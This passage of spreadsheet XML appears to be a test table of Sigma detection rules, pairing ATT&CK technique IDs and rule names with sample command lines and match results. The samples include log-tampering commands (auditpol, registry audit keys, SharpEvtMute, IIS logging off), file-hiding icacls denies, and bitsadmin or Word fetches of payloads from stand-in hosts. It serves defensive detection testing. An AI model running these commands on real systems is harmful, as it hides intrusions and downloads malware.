          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2755" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_icacls_deny</t>
        </is>
      </c>
      <c r="C2755" s="43" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone</t>
        </is>
      </c>
      <c r="D2755" s="43" t="inlineStr">
        <is>
          <t>4ae81040-fc1c-4249-bfa3-938d260214d9</t>
        </is>
      </c>
      <c r="E2755" s="43" t="inlineStr">
        <is>
          <t>icacls.exe C:\\Users\\Public\\secret /deny *S-1-1-0:(OI)(CI)(DE,DC)</t>
        </is>
      </c>
      <c r="F2755" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2755" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2755" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2755" s="43" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone (4ae81040-fc1c-4249-bfa3-938d260214d9)</t>
        </is>
      </c>
      <c r="J2755" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2755" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2756" ht="15.75" customHeight="1" s="42">
      <c r="A2756" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2756" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_icacls_deny</t>
        </is>
      </c>
      <c r="C2756" s="43" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone</t>
        </is>
      </c>
      <c r="D2756" s="43" t="inlineStr">
        <is>
          <t>4ae81040-fc1c-4249-bfa3-938d260214d9</t>
        </is>
      </c>
      <c r="E2756" s="43" t="inlineStr">
        <is>
          <t>icacls.exe "C:\\Users\\Public\\secret" /deny *S-1-1-0:(CI)(OI)(DE,DC)</t>
        </is>
      </c>
      <c r="F2756" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2756" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2756" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2756" s="43" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone (4ae81040-fc1c-4249-bfa3-938d260214d9)</t>
        </is>
      </c>
      <c r="J2756" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2756" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2757" ht="15.75" customHeight="1" s="42">
      <c r="A2757" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2757" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_icacls_deny</t>
        </is>
      </c>
      <c r="C2757" s="43" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone</t>
        </is>
      </c>
      <c r="D2757" s="43" t="inlineStr">
        <is>
          <t>4ae81040-fc1c-4249-bfa3-938d260214d9</t>
        </is>
      </c>
      <c r="E2757" s="43" t="inlineStr">
        <is>
          <t>icacls.exe "C:\\Users\\Public\\secret" /deny *S-1-1-0:(OI)(CI)(DE,DC) &amp;&amp; echo Test</t>
        </is>
      </c>
      <c r="F2757" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2757" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2757" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2757" s="43" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone (4ae81040-fc1c-4249-bfa3-938d260214d9)</t>
        </is>
      </c>
      <c r="J2757" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2757" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2758" ht="15.75" customHeight="1" s="42">
      <c r="A2758" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2758" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_nt_resource_kit_usage</t>
        </is>
      </c>
      <c r="C2758" s="43" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via NT Resource Kit Auditpol</t>
        </is>
      </c>
      <c r="D2758" s="43" t="inlineStr">
        <is>
          <t>c6c56ada-612b-42d1-9a29-adad3c5c2c1e</t>
        </is>
      </c>
      <c r="E2758" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v "ProcessCreationIncludeCmdLine_Enabled" /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2758" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2758" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2758" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2758" s="43" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via NT Resource Kit Auditpol (c6c56ada-612b-42d1-9a29-adad3c5c2c1e)</t>
        </is>
      </c>
      <c r="J2758" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2758" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2759" ht="15.75" customHeight="1" s="42">
      <c r="A2759" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2759" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_susp_execution</t>
        </is>
      </c>
      <c r="C2759" s="43" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via Auditpol</t>
        </is>
      </c>
      <c r="D2759" s="43" t="inlineStr">
        <is>
          <t>0a13e132-651d-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E2759" s="43" t="inlineStr">
        <is>
          <t>auditpol.exe /set /category:"Detailed Tracking" /success:disable</t>
        </is>
      </c>
      <c r="F2759" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2759" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2759" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2759" s="43" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via NT Resource Kit Auditpol (c6c56ada-612b-42d1-9a29-adad3c5c2c1e); Audit Policy Tampering Via NT Resource Kit Auditpol (c6c56ada-612b-42d1-9a29-adad3c5c2c1e)</t>
        </is>
      </c>
      <c r="J2759" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2759" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2760" ht="15.75" customHeight="1" s="42">
      <c r="A2760" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2760" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_susp_execution</t>
        </is>
      </c>
      <c r="C2760" s="43" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via Auditpol</t>
        </is>
      </c>
      <c r="D2760" s="43" t="inlineStr">
        <is>
          <t>0a13e132-651d-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E2760" s="43" t="inlineStr">
        <is>
          <t>auditpol.exe /set /category:"Detailed Tracking" /success:disable /failure:disable</t>
        </is>
      </c>
      <c r="F2760" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2760" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2760" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2760" s="43" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via Auditpol (0a13e132-651d-11eb-ae93-0242ac130002)</t>
        </is>
      </c>
      <c r="J2760" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2760" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2761" ht="15.75" customHeight="1" s="42">
      <c r="A2761" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2761" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_susp_execution</t>
        </is>
      </c>
      <c r="C2761" s="43" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via Auditpol</t>
        </is>
      </c>
      <c r="D2761" s="43" t="inlineStr">
        <is>
          <t>0a13e132-651d-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E2761" s="43" t="inlineStr">
        <is>
          <t>auditpol.exe /set /category:"Detailed Tracking" /success:disable /</t>
        </is>
      </c>
      <c r="F2761" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2761" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2761" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2761" s="43" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via Auditpol (0a13e132-651d-11eb-ae93-0242ac130002)</t>
        </is>
      </c>
      <c r="J2761" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2761" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2762" ht="15.75" customHeight="1" s="42">
      <c r="A2762" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2762" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpevtmute</t>
        </is>
      </c>
      <c r="C2762" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpEvtMute Execution</t>
        </is>
      </c>
      <c r="D2762" s="43" t="inlineStr">
        <is>
          <t>bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c</t>
        </is>
      </c>
      <c r="E2762" s="43" t="inlineStr">
        <is>
          <t>SharpEvtMute.exe --Filter "rule name { eventid == 4624 }" --Encoded</t>
        </is>
      </c>
      <c r="F2762" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2762" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2762" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2762" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J2762" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2762" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2763" ht="15.75" customHeight="1" s="42">
      <c r="A2763" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2763" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_http_logging</t>
        </is>
      </c>
      <c r="C2763" s="43" t="inlineStr">
        <is>
          <t>Disable Windows IIS HTTP Logging</t>
        </is>
      </c>
      <c r="D2763" s="43" t="inlineStr">
        <is>
          <t>e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e</t>
        </is>
      </c>
      <c r="E2763" s="43" t="inlineStr">
        <is>
          <t>appcmd.exe set config "Default Web Site" /section:httpLogging /dontLog:1</t>
        </is>
      </c>
      <c r="F2763" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2763" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2763" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2763" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J2763" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2763" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2764" ht="15.75" customHeight="1" s="42">
      <c r="A2764" s="43" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B2764" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_http_logging</t>
        </is>
      </c>
      <c r="C2764" s="43" t="inlineStr">
        <is>
          <t>Disable Windows IIS HTTP Logging</t>
        </is>
      </c>
      <c r="D2764" s="43" t="inlineStr">
        <is>
          <t>e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e</t>
        </is>
      </c>
      <c r="E2764" s="43" t="inlineStr">
        <is>
          <t>appcmd.exe set config "Default Web Site" /section:httplogging /dontLog:True</t>
        </is>
      </c>
      <c r="F2764" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2764" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2764" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2764" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J2764" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2764" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2765" ht="15.75" customHeight="1" s="42">
      <c r="A2765" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B2765" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_legacy_option</t>
        </is>
      </c>
      <c r="C2765" s="43" t="inlineStr">
        <is>
          <t>Suspicious High IntegrityLevel Conhost Legacy Option</t>
        </is>
      </c>
      <c r="D2765" s="43" t="inlineStr">
        <is>
          <t>3037d961-21e9-4732-b27a-637bcc7bf539</t>
        </is>
      </c>
      <c r="E2765" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\conhost.exe 0xffffffff -ForceV1</t>
        </is>
      </c>
      <c r="F2765" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2765" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2765" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2765" s="43" t="inlineStr">
        <is>
          <t>Suspicious Cabinet File Execution Via Msdt.EXE (dc4576d4-7467-424f-9eee-fd2b02855fe0)</t>
        </is>
      </c>
      <c r="J2765" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2765" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2766" ht="15.75" customHeight="1" s="42">
      <c r="A2766" s="43" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B2766" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_office_arbitrary_cli_download</t>
        </is>
      </c>
      <c r="C2766" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Using Office Application</t>
        </is>
      </c>
      <c r="D2766" s="43" t="inlineStr">
        <is>
          <t>4ae3e30b-b03f-43aa-87e3-b622f4048eed</t>
        </is>
      </c>
      <c r="E2766" s="43" t="inlineStr">
        <is>
          <t>WINWORD.EXE \\evil-server.local\share\payload.docx</t>
        </is>
      </c>
      <c r="F2766" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2766" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2766" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2766" s="43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2766" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2766" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2767" ht="15.75" customHeight="1" s="42">
      <c r="A2767" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2767" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download</t>
        </is>
      </c>
      <c r="C2767" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin</t>
        </is>
      </c>
      <c r="D2767" s="43" t="inlineStr">
        <is>
          <t>d059842b-6b9d-4ed1-b5c3-5b89143c6ede</t>
        </is>
      </c>
      <c r="E2767" s="43" t="inlineStr">
        <is>
          <t>bitsadmin.exe /addfile MyJob https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Users\thaim\AppData\Local\Temp\bitsadmin3_flag.ps1</t>
        </is>
      </c>
      <c r="F2767" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2767" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2767" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2767" s="43" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS (b9cbbc17-d00d-4e3d-a827-b06d03d2380d)</t>
        </is>
      </c>
      <c r="J2767" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2767" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2768" ht="15.75" customHeight="1" s="42">
      <c r="A2768" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2768" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download</t>
        </is>
      </c>
      <c r="C2768" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin</t>
        </is>
      </c>
      <c r="D2768" s="43" t="inlineStr">
        <is>
          <t>d059842b-6b9d-4ed1-b5c3-5b89143c6ede</t>
        </is>
      </c>
      <c r="E2768" s="43" t="inlineStr">
        <is>
          <t>bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Users\thaim\AppData\Local\Temp\bitsadmin1_flag.ps1</t>
        </is>
      </c>
      <c r="F2768" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2768" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2768" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2768" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin (8518ed3d-f7c9-4601-a26c-f361a4256a0c); File With Suspicious Extension Downloaded Via Bitsadmin (5b80a791-ad9b-4b75-bcc1-ad4e1e89c200); File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede); File Download Via Bitsadmin To An Uncommon Target Folder (6e30c82f-a9f8-4aab-b79c-7c12bce6f248); Monitoring For Persistence Via BITS (b9cbbc17-d00d-4e3d-a827-b06d03d2380d)</t>
        </is>
      </c>
      <c r="J2768" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2768" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2769" ht="15.75" customHeight="1" s="42">
      <c r="A2769" s="43" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B2769" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download</t>
        </is>
      </c>
      <c r="C2769" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin</t>
        </is>
      </c>
      <c r="D2769" s="43" t="inlineStr">
        <is>
          <t>d059842b-6b9d-4ed1-b5c3-5b89143c6ede</t>
        </is>
      </c>
      <c r="E2769" s="43" t="inlineStr">
        <is>
          <t>bitsadmin.exe /transfer MyJob http://example.com/payload.exe payload.exe</t>
        </is>
      </c>
      <c r="F2769" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2769" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2769" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2769" s="43" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS (b9cbbc17-d00d-4e3d-a827-b06d03d2380d)</t>
        </is>
      </c>
      <c r="J2769" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2769" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2770" ht="15.75" customHeight="1" s="42">
      <c r="A2770" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B2770" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C2770" s="43" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D2770" s="43" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E2770" s="43" t="inlineStr">
        <is>
          <t>PrintBrm.exe -f "C:\Users\Public\data.zip" -b</t>
        </is>
      </c>
      <c r="F2770" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2770" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2770" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2770" s="43" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468)</t>
        </is>
      </c>
      <c r="J2770" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2770" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2771" ht="15.75" customHeight="1" s="42">
      <c r="A2771" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B2771" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C2771" s="43" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D2771" s="43" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E2771" s="43" t="inlineStr">
        <is>
          <t>PrintBrm.exe -fC:\Users\Public\data.zip -b</t>
        </is>
      </c>
      <c r="F2771" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2771" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2771" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2771" s="43" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468); Suspicious Download from Office Domain (00d49ed5-4491-4271-a8db-650a4ef6f8c1)</t>
        </is>
      </c>
      <c r="J2771" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2771" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2772" ht="15.75" customHeight="1" s="42">
      <c r="A2772" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B2772" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C2772" s="43" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D2772" s="43" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E2772" s="43" t="inlineStr">
        <is>
          <t>PrintBrm.exe -f C:\Users\Public\data.zip</t>
        </is>
      </c>
      <c r="F2772" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2772" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2772" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2772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2772" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2772" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2773" ht="15.75" customHeight="1" s="42">
      <c r="A2773" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B2773" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C2773" s="43" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D2773" s="43" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E2773" s="43" t="inlineStr">
        <is>
          <t>PrintBrm.exe -f:C:\Users\Public\data.zip -b</t>
        </is>
      </c>
      <c r="F2773" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2773" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2773" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2773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2773" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2773" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2774" ht="15.75" customHeight="1" s="42">
      <c r="A2774" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B2774" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C2774" s="43" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D2774" s="43" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E2774" s="43" t="inlineStr">
        <is>
          <t>PrintBrm.exe -f C:\Users\Public\data.7z</t>
        </is>
      </c>
      <c r="F2774" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2774" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2774" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2774" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2774" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2774" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2775" ht="15.75" customHeight="1" s="42">
      <c r="A2775" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B2775" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C2775" s="43" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D2775" s="43" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E2775" s="43" t="inlineStr">
        <is>
          <t>set ZIP_PATH=C:\Users\Public\data.zip &amp;&amp; PrintBrm.exe -f %ZIP_PATH% -b</t>
        </is>
      </c>
      <c r="F2775" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2775" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2775" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2775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2775" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2775" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2776" ht="15.75" customHeight="1" s="42">
      <c r="A2776" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2776" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C2776" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D2776" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E2776" s="43" t="inlineStr">
        <is>
          <t>calc.exe -suspicious_flag</t>
        </is>
      </c>
      <c r="F2776" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2776" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2776" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2776" s="43" t="inlineStr">
        <is>
          <t>Suspicious CodePage Switch Via CHCP (c7942406-33dd-4377-a564-0f62db0593a3)</t>
        </is>
      </c>
      <c r="J2776" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2776" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2777" ht="15.75" customHeight="1" s="42">
      <c r="A2777" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2777" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C2777" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D2777" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E2777" s="43" t="inlineStr">
        <is>
          <t>calc.exe /parameter</t>
        </is>
      </c>
      <c r="F2777" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2777" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2777" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2777" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J2777" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2777" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2778" ht="15.75" customHeight="1" s="42">
      <c r="A2778" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2778" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C2778" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D2778" s="43" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E2778" s="43" t="inlineStr">
        <is>
          <t>calc.exe -help</t>
        </is>
      </c>
      <c r="F2778" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2778" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2778" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2778" s="43" t="inlineStr">
        <is>
          <t>CreateDump Process Dump (515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J2778" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2778" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2779" ht="15.75" customHeight="1" s="42">
      <c r="A2779" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2779" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C2779" s="43" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D2779" s="43" t="inlineStr">
        <is>
